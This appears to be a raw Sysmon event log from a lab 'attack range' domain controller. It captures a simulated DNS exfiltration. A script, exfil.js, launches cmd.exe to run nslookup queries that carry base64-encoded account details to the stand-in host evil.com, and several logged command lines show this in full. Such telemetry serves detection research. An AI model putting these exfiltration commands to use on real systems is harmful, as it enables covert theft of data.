23542300x8000000000000000213700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.660{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldtoy.tmpMD5=9C101754059B3D04F26CF3E2F51B88AA,SHA256=CC24D14F511AA03DA88D98786AE6BD9247656E6D05B1882F17E6E6D57E27DA80,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.629{2E1864BB-18F9-629A-9245-000000005F02}17007524C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9345-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.629{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.614{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.614{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9345-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.614{2E1864BB-18F9-629A-9145-000000005F02}58247664C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-9345-000000005F02}5124C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.626{2E1864BB-18F9-629A-9345-000000005F02}5124C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-9145-000000005F02}5824C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldtoy.tmp 2>&1 10341000x8000000000000000213691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.598{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9245-000000005F02}1700C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.598{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-9245-000000005F02}1700C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.598{2E1864BB-18F9-629A-9245-000000005F02}17007524C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9145-000000005F02}5824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.592{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9245-000000005F02}1700C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.576{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.576{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.576{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.576{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213683Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.576{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9145-000000005F02}5824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213682Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.576{2E1864BB-18E0-629A-6742-000000005F02}39764936C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-9145-000000005F02}5824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.587{2E1864BB-18F9-629A-9145-000000005F02}5824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldtoy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.576{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkaahp.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-18F9-629A-8F45-000000005F02}72043084C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-9045-000000005F02}4040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-9045-000000005F02}4040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-18F9-629A-8E45-000000005F02}54886888C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-9045-000000005F02}4040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.561{2E1864BB-18F9-629A-9045-000000005F02}4040C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-8E45-000000005F02}5488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkaahp.tmp 2>&1 10341000x8000000000000000213671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.529{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8F45-000000005F02}7204C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.529{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8F45-000000005F02}7204C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.529{2E1864BB-18F9-629A-8F45-000000005F02}72043084C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8E45-000000005F02}5488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 